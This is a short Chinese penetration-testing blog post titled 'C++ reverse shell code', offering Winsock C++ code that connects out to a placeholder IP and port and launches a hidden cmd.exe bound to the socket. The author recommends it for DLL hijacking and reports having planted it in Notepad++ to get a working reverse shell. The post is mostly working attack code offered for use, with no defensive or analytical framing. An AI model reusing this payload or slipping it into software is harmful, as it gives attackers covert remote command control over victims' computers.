c++反弹代码
首页 > web安全 > 渗透测试    作者:webbaozi   2017年10月30日 22:17 星期一   热度:904°   已自动提交收录  
时间:2017-10-30 22:17   热度:904° 

在dll劫持中使用挺不错的,之前放在nopad++中,成功反弹。

代码如下:


LPCSTR szMyUniqueNamedEvent = "sysnullevt";
	HANDLE m_hEvent = CreateEventA(NULL, TRUE, FALSE, szMyUniqueNamedEvent);

	switch (GetLastError())
	{
		// app is already running
	case ERROR_ALREADY_EXISTS:
	{
		CloseHandle(m_hEvent);
		break;
	}

	case ERROR_SUCCESS:
	{

		break;
	}
	}


	WSAStartup(MAKEWORD(2, 2), &wsaData);
	Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

	hax.sin_family = AF_INET;
	hax.sin_port = htons(atoi("端口"));

	hax.sin_addr.s_addr = inet_addr("IP");
	WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);

	memset(&ini_processo, 0, sizeof(ini_processo));
	ini_processo.cb = sizeof(ini_processo);
	ini_processo.dwFlags = STARTF_USESTDHANDLES;
	ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

	CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, (LPSTARTUPINFOA)&ini_processo, &processo_info);


二维码加载中...
本文作者:webbaozi      文章标题: c++反弹代码
本文地址:http://www.webbaozi.com/stcs/85.html
版权声明:若无注明,本文皆为“baozi|学与用”原创,转载请保留文章出处。

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1